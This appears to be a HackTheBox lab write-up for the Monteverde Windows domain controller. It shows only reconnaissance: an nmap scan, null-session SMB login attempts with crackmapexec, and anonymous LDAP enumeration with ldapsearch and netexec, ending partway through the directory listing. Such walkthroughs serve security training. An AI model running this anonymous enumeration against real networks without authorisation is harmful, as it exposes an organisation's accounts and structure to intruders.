HackTheBox Monteverde Writeup

Posted Jun 11, 2025

By wzwr1029 18 min read

Nmap Enumeration

  
# Nmap 7.95 scan initiated Wed Jun 11 11:44:06 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN nmap 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up, received echo-reply ttl 127 (0.051s latency).
Scanned at 2025-06-11 11:44:06 GMT for 55s
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-11 03:23:04Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-06-11T03:23:10
|_  start_date: N/A
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 2859/tcp): CLEAN (Timeout)
|   Check 2 (port 42431/tcp): CLEAN (Timeout)
|   Check 3 (port 47166/udp): CLEAN (Timeout)
|   Check 4 (port 6831/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: -8h21m12s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 11 11:45:01 2025 -- 1 IP address (1 host up) scanned in 55.25 seconds

SMB Enumeration

Null User Logins

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ crackmapexec smb 10.10.10.172 -u '' -p '' --shares                      
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB         10.10.10.172    445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

DoesNotExist User Logins

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ crackmapexec smb 10.10.10.172 -u 'DoesNotExist' -p '' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\DoesNotExist: STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                            
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ crackmapexec smb 10.10.10.172 -u 'DoesNotExist' -p 'a' --shares
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\DoesNotExist:a STATUS_LOGON_FAILURE 

LDAP Enumeration

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ crackmapexec ldap 10.10.10.172 -u '' -p ''
Traceback (most recent call last):
  File "/usr/bin/crackmapexec", line 8, in <module>
    sys.exit(main())
             ~~~~^^
  File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 257, in main
    asyncio.run(
    ~~~~~~~~~~~^
        start_threadpool(protocol_object, args, db, targets, jitter)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    )
    ^
  File "/usr/lib/python3.13/asyncio/runners.py", line 195, in run
    return runner.run(main)
           ~~~~~~~~~~^^^^^^
  File "/usr/lib/python3.13/asyncio/runners.py", line 118, in run
    return self._loop.run_until_complete(task)
           ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~^^^^^^
  File "/usr/lib/python3.13/asyncio/base_events.py", line 719, in run_until_complete
    return future.result()
           ~~~~~~~~~~~~~^^
  File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 105, in start_threadpool
    await asyncio.gather(*jobs)
  File "/usr/lib/python3/dist-packages/cme/crackmapexec.py", line 69, in run_protocol
    await asyncio.wait_for(
    ...<2 lines>...
    )
  File "/usr/lib/python3.13/asyncio/tasks.py", line 507, in wait_for
    return await fut
           ^^^^^^^^^
  File "/usr/lib/python3.13/concurrent/futures/thread.py", line 59, in run
    result = self.fn(*self.args, **self.kwargs)
  File "/usr/lib/python3/dist-packages/cme/protocols/ldap.py", line 77, in __init__
    self.smb_share_name = smb_share_name
                          ^^^^^^^^^^^^^^
NameError: name 'smb_share_name' is not defined

Don’t know why crackmapexec ldap doesn’t work… Let’s try the usual way

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ ldapsearch -x -H ldap://10.10.10.172 -s base
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=MEGABANK,DC=LOCAL
ldapServiceName: MEGABANK.LOCAL:monteverde$@MEGABANK.LOCAL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCA
 L
serverName: CN=MONTEVERDE,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Co
 nfiguration,DC=MEGABANK,DC=LOCAL
schemaNamingContext: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=MEGABANK,DC=LOCAL
namingContexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingContexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingContexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
isSynchronized: TRUE
highestCommittedUSN: 77917
dsServiceName: CN=NTDS Settings,CN=MONTEVERDE,CN=Servers,CN=Default-First-Site
 -Name,CN=Sites,CN=Configuration,DC=MEGABANK,DC=LOCAL
dnsHostName: MONTEVERDE.MEGABANK.LOCAL
defaultNamingContext: DC=MEGABANK,DC=LOCAL
currentTime: 20250611033138.0Z
configurationNamingContext: CN=Configuration,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Actually crackmapexec is older version, we should use netexec now!

  
┌──(wzwr㉿kali)-[~/htb/monteverde]
└─$ netexec ldap 10.10.10.172 -u '' -p '' --users
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
LDAP        10.10.10.172    389    MONTEVERDE       [+] MEGABANK.LOCAL\: 
LDAP        10.10.10.172    389    MONTEVERDE       [*] Total records returned: 270
LDAP        10.10.10.172    389    MONTEVERDE       DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Users,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Computers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       OU=Domain Controllers,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=LostAndFound,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Infrastructure,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ForeignSecurityPrincipals,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Program Data,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Microsoft,CN=Program Data,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=NTDS Quotas,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Managed Service Accounts,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Keys,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=WinsockServices,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RpcServices,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=FileLinks,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=VolumeTable,CN=FileLinks,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ObjectMoveTable,CN=FileLinks,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Default Domain Policy,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=AppCategories,CN=Default Domain Policy,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Meetings,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Policies,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=RAS and IAS Servers Access Check,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=File Replication Service,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Dfs-Configuration,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecPolicy{72385230-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecISAKMPPolicy{72385231-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{72385232-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{59319BE2-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{594272E2-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{72385233-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecFilter{7238523A-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{59319BDF-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{7238523B-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecFilter{72385235-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecPolicy{72385236-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecISAKMPPolicy{72385237-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{59319C04-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{59319C01-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecPolicy{7238523C-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecISAKMPPolicy{7238523D-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{7238523E-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{59319BF3-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{594272FD-071D-11D3-AD22-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{7238523F-70FA-11D1-864C-14A300000000},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNegotiationPolicy{59319BF0-5EE3-11D2-ACE8-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ipsecNFA{6A1F5C6F-72B7-11D2-ACF0-0060B0ECCA17},CN=IP Security,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=AdminSDHolder,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ComPartitions,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ComPartitionSets,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=WMIPolicy,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=ab402345-d3c3-455d-9ff7-40268a1099b6,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=bab5f54d-06c8-48de-9b87-d78b796564e4,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=f3dd09dd-25e8-4f9c-85df-12d6d2f2f2f5,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=2416c60a-fe15-4d7a-a61e-dffd5df864d3,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=7868d4c8-ac41-4e05-b401-776280e8e9f1,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=860c36ed-5241-4c62-a18b-cf6ff9994173,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=0e660ea3-8a5e-4495-9ad7-ca1bd4638f9e,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=a86fe12a-0f62-4e2a-b271-d27f601f8182,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=d85c0bfd-094f-4cad-a2b5-82ac9268475d,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6ada9ff7-c9df-45c1-908e-9fef2fab008a,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=10b3ad2a-6883-4fa7-90fc-6377cbdc1b26,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=98de1d3e-6611-443b-8b4e-f4337f1ded0b,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=f607fd87-80cf-45e2-890b-6cf97ec0e284,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=9cac1f66-2167-47ad-a472-2a13251310e4,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6ff880d6-11e7-4ed1-a20f-aac45da48650,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=446f24ea-cfd5-4c52-8346-96e170bcb912,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=51cba88b-99cf-4e16-bef2-c427b38d0767,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=a3dac986-80e7-4e59-a059-54cb1ab43cb9,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=293f0798-ea5c-4455-9f5d-45f33a30703b,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=5c82b233-75fc-41b3-ac71-c69592e6bf15,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=7ffef925-405b-440a-8d58-35e8cd6e98c3,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=4dfbb973-8a62-4310-a90c-776e00f83222,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=8437C3D8-7689-4200-BF38-79E4AC33DFA0,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=7cfb016c-4f87-4406-8166-bd9df943947f,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=f7ed4553-d82b-49ef-a839-2f38a36bb069,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=8ca38317-13a4-4bd4-806f-ebed6acb5d0c,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=3c784009-1f57-4e2a-9b04-6915c9e71961,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5678-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5679-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567e-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd567f-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5680-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5681-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5682-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5683-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5684-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5685-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5686-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5687-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5688-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd5689-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd568a-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd568b-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd568c-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=6bcd568d-8314-11d6-977b-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=3051c66f-b332-4a73-9a20-2d6a7d6e6a1c,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=3e4f4182-ac5d-4378-b760-0eab2de593e2,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=c4f17608-e611-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=13d15cf0-e6c8-11d6-9793-00c04f613221,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=8ddf6913-1c7b-4c59-a5af-b9ca3b3d2c4c,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=dda1d01d-4bd7-4c49-a184-46f9241b560e,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
LDAP        10.10.10.172    389    MONTEVERDE       CN=a1789bfb-e0a2-4739-8cc0-e77d892d080a,CN=Operations,CN=DomainUpdates,CN=System,DC=MEGABANK,DC=LOCAL
